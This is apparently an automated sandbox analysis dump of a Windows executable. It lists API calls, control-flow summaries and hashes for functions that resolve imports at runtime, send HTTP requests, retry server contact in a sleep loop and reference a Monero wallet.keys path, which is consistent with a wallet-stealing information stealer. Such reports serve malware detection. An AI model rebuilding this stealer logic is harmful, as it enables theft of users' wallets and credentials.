53a8a0 call 53a800 call 53a740 call 53a920 * 2 call 53a8a0 call 53a800 * 2 call 53aad0 lstrlen call 53aad0 * 2 lstrlen call 53aad0 HttpSendRequestA 908->909 910 524ebe-524ec5 InternetCloseHandle 908->910 1021 524e32-524e5c InternetReadFile 909->1021 910->819 1022 524e67-524eb9 InternetCloseHandle call 53a800 1021->1022 1023 524e5e-524e65 1021->1023 1022->910 1023->1022 1024 524e69-524ea7 call 53a9b0 call 53a8a0 call 53a800 1023->1024 1024->1021
                                      APIs
                                        • Part of subcall function 0053A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0053A7E6
                                        • Part of subcall function 005247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00524839
                                        • Part of subcall function 005247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00524849
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00524915
                                      • StrCmpCA.SHLWAPI(?,00F1E748), ref: 0052493A
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00524ABA
                                      • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00540DDB,00000000,?,?,00000000,?,",00000000,?,00F1E758), ref: 00524DE8
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00524E04
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00524E18
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00524E49
                                      • InternetCloseHandle.WININET(00000000), ref: 00524EAD
                                      • InternetCloseHandle.WININET(00000000), ref: 00524EC5
                                      • HttpOpenRequestA.WININET(00000000,00F1E808,?,00F1DF48,00000000,00000000,00400100,00000000), ref: 00524B15
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                        • Part of subcall function 0053A920: lstrcpy.KERNEL32(00000000,?), ref: 0053A972
                                        • Part of subcall function 0053A920: lstrcat.KERNEL32(00000000), ref: 0053A982
                                      • InternetCloseHandle.WININET(00000000), ref: 00524ECF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                      • String ID: "$"$------$------$------
                                      • API String ID: 460715078-2180234286
                                      • Opcode ID: c8e8ce209ba2de3817c9f4a7b0d7cee95f902dc9a64753c40bc6241a306f06db
                                      • Instruction ID: f1cfa6d469eeebc7b1914ec45291da18477af80bd6479bf400c242ee01114996
                                      • Opcode Fuzzy Hash: c8e8ce209ba2de3817c9f4a7b0d7cee95f902dc9a64753c40bc6241a306f06db
                                      • Instruction Fuzzy Hash: B812ED72910219AADB15EB90DC9AFEEBB78BF94300F504199F14672091EF702F49CF66
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005211B7), ref: 00537880
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00537887
                                      • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0053789F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateNameProcessUser
                                      • String ID:
                                      • API String ID: 1296208442-0
                                      • Opcode ID: 0e835011d1d3f2b5e75d05ad3a0f7fa658586e2268c2def20baa1563adb76547
                                      • Instruction ID: 81b4437becce929cdc886f346f7a8ba8b929a0fefbce72bd0535594ce54e7124
                                      • Opcode Fuzzy Hash: 0e835011d1d3f2b5e75d05ad3a0f7fa658586e2268c2def20baa1563adb76547
                                      • Instruction Fuzzy Hash: E0F04FB1D44309ABCB10DF98DD49BAEFBB8FB08711F10465AFA06A3680C7B815048FA1
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitInfoProcessSystem
                                      • String ID:
                                      • API String ID: 752954902-0
                                      • Opcode ID: 7a296bc43a90c5c76152db24799a8f78ba5a08f6ec47f877e7ae5b169f67f152
                                      • Instruction ID: 97d47990bfe4e99c9a08c4a36a206fc72214eceb54f2ae4e135f2b758b1fe691
                                      • Opcode Fuzzy Hash: 7a296bc43a90c5c76152db24799a8f78ba5a08f6ec47f877e7ae5b169f67f152
                                      • Instruction Fuzzy Hash: AED05E7490030CEBCB00DFE0D84A6DDBB78FB08311F000554D90672340EA709491CAAA

                                      Control-flow Graph

                                      control_flow_graph 633 539c10-539c1a 634 539c20-53a031 GetProcAddress * 43 633->634 635 53a036-53a0ca LoadLibraryA * 8 633->635 634->635 636 53a146-53a14d 635->636 637 53a0cc-53a141 GetProcAddress * 5 635->637 638 53a153-53a211 GetProcAddress * 8 636->638 639 53a216-53a21d 636->639 637->636 638->639 640 53a298-53a29f 639->640 641 53a21f-53a293 GetProcAddress * 5 639->641 642 53a337-53a33e 640->642 643 53a2a5-53a332 GetProcAddress * 6 640->643 641->640 644 53a344-53a41a GetProcAddress * 9 642->644 645 53a41f-53a426 642->645 643->642 644->645 646 53a4a2-53a4a9 645->646 647 53a428-53a49d GetProcAddress * 5 645->647 648 53a4ab-53a4d7 GetProcAddress * 2 646->648 649 53a4dc-53a4e3 646->649 647->646 648->649 650 53a515-53a51c 649->650 651 53a4e5-53a510 GetProcAddress * 2 649->651 652 53a612-53a619 650->652 653 53a522-53a60d GetProcAddress * 10 650->653 651->650 654 53a61b-53a678 GetProcAddress * 4 652->654 655 53a67d-53a684 652->655 653->652 654->655 656 53a686-53a699 GetProcAddress 655->656 657 53a69e-53a6a5 655->657 656->657 658 53a6a7-53a703 GetProcAddress * 4 657->658 659 53a708-53a709 657->659 658->659
                                      APIs
                                      • GetProcAddress.KERNEL32(74DD0000,00F05C90), ref: 00539C2D
                                      • GetProcAddress.KERNEL32(74DD0000,00F05E10), ref: 00539C45
                                      • GetProcAddress.KERNEL32(74DD0000,00F1A2C0), ref: 00539C5E
                                      • GetProcAddress.KERNEL32(74DD0000,00F1A278), ref: 00539C76
                                      • GetProcAddress.KERNEL32(74DD0000,00F1A290), ref: 00539C8E
                                      • GetProcAddress.KERNEL32(74DD0000,00F1A230), ref: 00539CA7
                                      • GetProcAddress.KERNEL32(74DD0000,00F0BBA8), ref: 00539CBF
                                      • GetProcAddress.KERNEL32(74DD0000,00F1CEA0), ref: 00539CD7
                                      • GetProcAddress.KERNEL32(74DD0000,00F1D098), ref: 00539CF0
                                      • GetProcAddress.KERNEL32(74DD0000,00F1CF30), ref: 00539D08
                                      • GetProcAddress.KERNEL32(74DD0000,00F1CE88), ref: 00539D20
                                      • GetProcAddress.KERNEL32(74DD0000,00F05B70), ref: 00539D39
                                      • GetProcAddress.KERNEL32(74DD0000,00F05B90), ref: 00539D51
                                      • GetProcAddress.KERNEL32(74DD0000,00F05E50), ref: 00539D69
                                      • GetProcAddress.KERNEL32(74DD0000,00F05BB0), ref: 00539D82
                                      • GetProcAddress.KERNEL32(74DD0000,00F1CEB8), ref: 00539D9A
                                      • GetProcAddress.KERNEL32(74DD0000,00F1CED0), ref: 00539DB2
                                      • GetProcAddress.KERNEL32(74DD0000,00F0BBD0), ref: 00539DCB
                                      • GetProcAddress.KERNEL32(74DD0000,00F05D50), ref: 00539DE3
                                      • GetProcAddress.KERNEL32(74DD0000,00F1CE70), ref: 00539DFB
                                      • GetProcAddress.KERNEL32(74DD0000,00F1CE28), ref: 00539E14
                                      • GetProcAddress.KERNEL32(74DD0000,00F1CFD8), ref: 00539E2C
                                      • GetProcAddress.KERNEL32(74DD0000,00F1D050), ref: 00539E44
                                      • GetProcAddress.KERNEL32(74DD0000,00F05BD0), ref: 00539E5D
                                      • GetProcAddress.KERNEL32(74DD0000,00F1D080), ref: 00539E75
                                      • GetProcAddress.KERNEL32(74DD0000,00F1CFA8), ref: 00539E8D
                                      • GetProcAddress.KERNEL32(74DD0000,00F1D020), ref: 00539EA6
                                      • GetProcAddress.KERNEL32(74DD0000,00F1CEE8), ref: 00539EBE
                                      • GetProcAddress.KERNEL32(74DD0000,00F1CF00), ref: 00539ED6
                                      • GetProcAddress.KERNEL32(74DD0000,00F1CF48), ref: 00539EEF
                                      • GetProcAddress.KERNEL32(74DD0000,00F1CDF8), ref: 00539F07
                                      • GetProcAddress.KERNEL32(74DD0000,00F1CE58), ref: 00539F1F
                                      • GetProcAddress.KERNEL32(74DD0000,00F1CF18), ref: 00539F38
                                      • GetProcAddress.KERNEL32(74DD0000,00F105C0), ref: 00539F50
                                      • GetProcAddress.KERNEL32(74DD0000,00F1CF60), ref: 00539F68
                                      • GetProcAddress.KERNEL32(74DD0000,00F1CFC0), ref: 00539F81
                                      • GetProcAddress.KERNEL32(74DD0000,00F05CD0), ref: 00539F99
                                      • GetProcAddress.KERNEL32(74DD0000,00F1CF78), ref: 00539FB1
                                      • GetProcAddress.KERNEL32(74DD0000,00F059F0), ref: 00539FCA
                                      • GetProcAddress.KERNEL32(74DD0000,00F1CF90), ref: 00539FE2
                                      • GetProcAddress.KERNEL32(74DD0000,00F1D068), ref: 00539FFA
                                      • GetProcAddress.KERNEL32(74DD0000,00F058D0), ref: 0053A013
                                      • GetProcAddress.KERNEL32(74DD0000,00F05810), ref: 0053A02B
                                      • LoadLibraryA.KERNEL32(00F1CE40,?,00535CA3,00540AEB,?,?,?,?,?,?,?,?,?,?,00540AEA,00540AE3), ref: 0053A03D
                                      • LoadLibraryA.KERNEL32(00F1CFF0,?,00535CA3,00540AEB,?,?,?,?,?,?,?,?,?,?,00540AEA,00540AE3), ref: 0053A04E
                                      • LoadLibraryA.KERNEL32(00F1D008,?,00535CA3,00540AEB,?,?,?,?,?,?,?,?,?,?,00540AEA,00540AE3), ref: 0053A060
                                      • LoadLibraryA.KERNEL32(00F1D038,?,00535CA3,00540AEB,?,?,?,?,?,?,?,?,?,?,00540AEA,00540AE3), ref: 0053A072
                                      • LoadLibraryA.KERNEL32(00F1D0B0,?,00535CA3,00540AEB,?,?,?,?,?,?,?,?,?,?,00540AEA,00540AE3), ref: 0053A083
                                      • LoadLibraryA.KERNEL32(00F1D0C8,?,00535CA3,00540AEB,?,?,?,?,?,?,?,?,?,?,00540AEA,00540AE3), ref: 0053A095
                                      • LoadLibraryA.KERNEL32(00F1D0E0,?,00535CA3,00540AEB,?,?,?,?,?,?,?,?,?,?,00540AEA,00540AE3), ref: 0053A0A7
                                      • LoadLibraryA.KERNEL32(00F1CE10,?,00535CA3,00540AEB,?,?,?,?,?,?,?,?,?,?,00540AEA,00540AE3), ref: 0053A0B8
                                      • GetProcAddress.KERNEL32(75290000,00F05790), ref: 0053A0DA
                                      • GetProcAddress.KERNEL32(75290000,00F1D140), ref: 0053A0F2
                                      • GetProcAddress.KERNEL32(75290000,00F198A0), ref: 0053A10A
                                      • GetProcAddress.KERNEL32(75290000,00F1D218), ref: 0053A123
                                      • GetProcAddress.KERNEL32(75290000,00F058F0), ref: 0053A13B
                                      • GetProcAddress.KERNEL32(6FCD0000,00F0B9A0), ref: 0053A160
                                      • GetProcAddress.KERNEL32(6FCD0000,00F056B0), ref: 0053A179
                                      • GetProcAddress.KERNEL32(6FCD0000,00F0B9C8), ref: 0053A191
                                      • GetProcAddress.KERNEL32(6FCD0000,00F1D3B0), ref: 0053A1A9
                                      • GetProcAddress.KERNEL32(6FCD0000,00F1D1D0), ref: 0053A1C2
                                      • GetProcAddress.KERNEL32(6FCD0000,00F057D0), ref: 0053A1DA
                                      • GetProcAddress.KERNEL32(6FCD0000,00F05910), ref: 0053A1F2
                                      • GetProcAddress.KERNEL32(6FCD0000,00F1D380), ref: 0053A20B
                                      • GetProcAddress.KERNEL32(752C0000,00F05A90), ref: 0053A22C
                                      • GetProcAddress.KERNEL32(752C0000,00F05990), ref: 0053A244
                                      • GetProcAddress.KERNEL32(752C0000,00F1D350), ref: 0053A25D
                                      • GetProcAddress.KERNEL32(752C0000,00F1D398), ref: 0053A275
                                      • GetProcAddress.KERNEL32(752C0000,00F05A10), ref: 0053A28D
                                      • GetProcAddress.KERNEL32(74EC0000,00F0B6D0), ref: 0053A2B3
                                      • GetProcAddress.KERNEL32(74EC0000,00F0B658), ref: 0053A2CB
                                      • GetProcAddress.KERNEL32(74EC0000,00F1D1E8), ref: 0053A2E3
                                      • GetProcAddress.KERNEL32(74EC0000,00F058B0), ref: 0053A2FC
                                      • GetProcAddress.KERNEL32(74EC0000,00F05A30), ref: 0053A314
                                      • GetProcAddress.KERNEL32(74EC0000,00F0B900), ref: 0053A32C
                                      • GetProcAddress.KERNEL32(75BD0000,00F1D3C8), ref: 0053A352
                                      • GetProcAddress.KERNEL32(75BD0000,00F05930), ref: 0053A36A
                                      • GetProcAddress.KERNEL32(75BD0000,00F19740), ref: 0053A382
                                      • GetProcAddress.KERNEL32(75BD0000,00F1D128), ref: 0053A39B
                                      • GetProcAddress.KERNEL32(75BD0000,00F1D290), ref: 0053A3B3
                                      • GetProcAddress.KERNEL32(75BD0000,00F05850), ref: 0053A3CB
                                      • GetProcAddress.KERNEL32(75BD0000,00F056D0), ref: 0053A3E4
                                      • GetProcAddress.KERNEL32(75BD0000,00F1D2D8), ref: 0053A3FC
                                      • GetProcAddress.KERNEL32(75BD0000,00F1D2C0), ref: 0053A414
                                      • GetProcAddress.KERNEL32(75A70000,00F05950), ref: 0053A436
                                      • GetProcAddress.KERNEL32(75A70000,00F1D248), ref: 0053A44E
                                      • GetProcAddress.KERNEL32(75A70000,00F1D368), ref: 0053A466
                                      • GetProcAddress.KERNEL32(75A70000,00F1D2F0), ref: 0053A47F
                                      • GetProcAddress.KERNEL32(75A70000,00F1D308), ref: 0053A497
                                      • GetProcAddress.KERNEL32(75450000,00F056F0), ref: 0053A4B8
                                      • GetProcAddress.KERNEL32(75450000,00F05970), ref: 0053A4D1
                                      • GetProcAddress.KERNEL32(75DA0000,00F05A50), ref: 0053A4F2
                                      • GetProcAddress.KERNEL32(75DA0000,00F1D230), ref: 0053A50A
                                      • GetProcAddress.KERNEL32(6F070000,00F057F0), ref: 0053A530
                                      • GetProcAddress.KERNEL32(6F070000,00F059B0), ref: 0053A548
                                      • GetProcAddress.KERNEL32(6F070000,00F05710), ref: 0053A560
                                      • GetProcAddress.KERNEL32(6F070000,00F1D3E0), ref: 0053A579
                                      • GetProcAddress.KERNEL32(6F070000,00F059D0), ref: 0053A591
                                      • GetProcAddress.KERNEL32(6F070000,00F05A70), ref: 0053A5A9
                                      • GetProcAddress.KERNEL32(6F070000,00F05730), ref: 0053A5C2
                                      • GetProcAddress.KERNEL32(6F070000,00F05750), ref: 0053A5DA
                                      • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0053A5F1
                                      • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0053A607
                                      • GetProcAddress.KERNEL32(75AF0000,00F1D110), ref: 0053A629
                                      • GetProcAddress.KERNEL32(75AF0000,00F197F0), ref: 0053A641
                                      • GetProcAddress.KERNEL32(75AF0000,00F1D278), ref: 0053A659
                                      • GetProcAddress.KERNEL32(75AF0000,00F1D200), ref: 0053A672
                                      • GetProcAddress.KERNEL32(75D90000,00F05770), ref: 0053A693
                                      • GetProcAddress.KERNEL32(6E330000,00F1D320), ref: 0053A6B4
                                      • GetProcAddress.KERNEL32(6E330000,00F057B0), ref: 0053A6CD
                                      • GetProcAddress.KERNEL32(6E330000,00F1D260), ref: 0053A6E5
                                      • GetProcAddress.KERNEL32(6E330000,00F1D0F8), ref: 0053A6FD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: HttpQueryInfoA$InternetSetOptionA
                                      • API String ID: 2238633743-1775429166
                                      • Opcode ID: 05989f181c13ac5d09fe7787094cdbf8cd8fc862906e239fe60c99656e42744d
                                      • Instruction ID: bddfe914992b46d8041d0cc782aef9579598f1ef6333ec53b7bf36772ee2d210
                                      • Opcode Fuzzy Hash: 05989f181c13ac5d09fe7787094cdbf8cd8fc862906e239fe60c99656e42744d
                                      • Instruction Fuzzy Hash: 74623AB5500341BFC745DFA8EE889563BF9F79C201714C51AE60BE3224DABDA841DF2A

                                      Control-flow Graph (function at 0x526280, basic blocks 0x526280-0x52652d)

                                      • Rendered graph omitted from the text dump. Block order: InternetOpenA and StrCmpCA in the entry block, InternetConnectA at 0x52631e, HttpOpenRequestA at 0x526364, InternetSetOptionA at 0x52639e on one branch, HttpSendRequestA and HttpQueryInfoA at 0x5263c5, a loop around InternetReadFile at 0x526456 that appends each chunk via the subcalls at 0x53a9b0/0x53a8a0, and three InternetCloseHandle calls (0x5264c7, 0x5264f5, 0x5264ff) chained on the exit path; the failure paths of InternetConnectA and HttpOpenRequestA jump straight into that close chain.
                                      APIs
                                        • Part of subcall function 0053A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0053A7E6
                                        • Part of subcall function 005247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00524839
                                        • Part of subcall function 005247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00524849
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                      • InternetOpenA.WININET(00540DFE,00000001,00000000,00000000,00000000), ref: 005262E1
                                      • StrCmpCA.SHLWAPI(?,00F1E748), ref: 00526303
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00526335
                                      • HttpOpenRequestA.WININET(00000000,GET,?,00F1DF48,00000000,00000000,00400100,00000000), ref: 00526385
                                      • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005263BF
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005263D1
                                      • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 005263FD
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0052646D
                                      • InternetCloseHandle.WININET(00000000), ref: 005264EF
                                      • InternetCloseHandle.WININET(00000000), ref: 005264F9
                                      • InternetCloseHandle.WININET(00000000), ref: 00526503
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: same set of associated memory dumps as listed above
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                      • String ID: ERROR$ERROR$GET
                                      • API String ID: 3749127164-2509457195
                                      • Opcode ID: a8a4e5bbd8ababc98683a0491871f1afd5c50df5cb7f88ea4eddcd47e9892ff5
                                      • Instruction ID: c6dd74edfe3cbf79207b828c5ef48bf1b18918aaa11e7c6cbc60b41f8d2cafad
                                      • Opcode Fuzzy Hash: a8a4e5bbd8ababc98683a0491871f1afd5c50df5cb7f88ea4eddcd47e9892ff5
                                      • Instruction Fuzzy Hash: A8712C71A00318ABDF14EBA0DC99BEEBB74BF45700F108598F50A6B1D4DBB46A85CF91

                                      Control-flow Graph (function at 0x535510, basic blocks 0x535510-0x535ac6)

                                      • Rendered graph omitted from the text dump. The routine runs a chain of subcalls (0x521590, 0x5352c0, 0x5351f0) and after each one compares the result with StrCmpCA against "ERROR" (blocks 0x5355d7, 0x535693, 0x53571e, 0x5357da, 0x5358d3, 0x53598f). The block at 0x535a16 calls Sleep and loops back to 0x53557c, so the whole chain is retried after the 0xEA60 ms sleep listed under APIs; the blocks at 0x5357dc, 0x535991 and 0x535a28 lead to the common exit at 0x535ac3.
                                      APIs
                                        • Part of subcall function 0053A820: lstrlen.KERNEL32(00524F05,?,?,00524F05,00540DDE), ref: 0053A82B
                                        • Part of subcall function 0053A820: lstrcpy.KERNEL32(00540DDE,00000000), ref: 0053A885
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00535644
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 005356A1
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00535857
                                        • Part of subcall function 0053A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0053A7E6
                                        • Part of subcall function 005351F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00535228
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                        • Part of subcall function 005352C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00535318
                                        • Part of subcall function 005352C0: lstrlen.KERNEL32(00000000), ref: 0053532F
                                        • Part of subcall function 005352C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00535364
                                        • Part of subcall function 005352C0: lstrlen.KERNEL32(00000000), ref: 00535383
                                        • Part of subcall function 005352C0: lstrlen.KERNEL32(00000000), ref: 005353AE
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0053578B
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00535940
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00535A0C
                                      • Sleep.KERNEL32(0000EA60), ref: 00535A1B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: same set of associated memory dumps as listed above
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen$Sleep
                                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                      • API String ID: 507064821-2791005934
                                      • Opcode ID: 5f5330b22730a744f521bf77d459a689d3556efa216af8a3b07f7e278f1b4855
                                      • Instruction ID: 046e0785843272eb79e35932a3d9fc635d9e5c7365fac4fb5b5e684d51c47de7
                                      • Opcode Fuzzy Hash: 5f5330b22730a744f521bf77d459a689d3556efa216af8a3b07f7e278f1b4855
                                      • Instruction Fuzzy Hash: AEE14472910205AACB14FBB0DC9AEEDBB78BF94300F508528F54766095FF746A09CF96

                                      Control-flow Graph (function at 0x5317a0, basic blocks 0x5317a0-0x5319cd)

                                      • Rendered graph omitted from the text dump. The entry block runs StrCmpCA and branches to ExitProcess at 0x5317cf on a match (the "block" string listed under APIs). Otherwise a loop (0x5317f4 to 0x53199e) iterates over the input, and block 0x531817 dispatches to thirteen targets, most of them single StrCmpCA comparisons (0x53185d, 0x53187f, 0x5318ad, 0x5318cf, 0x5318f1, 0x531913, 0x531932, 0x531951, 0x531970) or a call to 0x53a820; every target rejoins the loop head, so the function is a multi-way dispatch on string comparisons, with the exit at 0x5319c2.
                                      APIs
                                      • StrCmpCA.SHLWAPI(00000000,block), ref: 005317C5
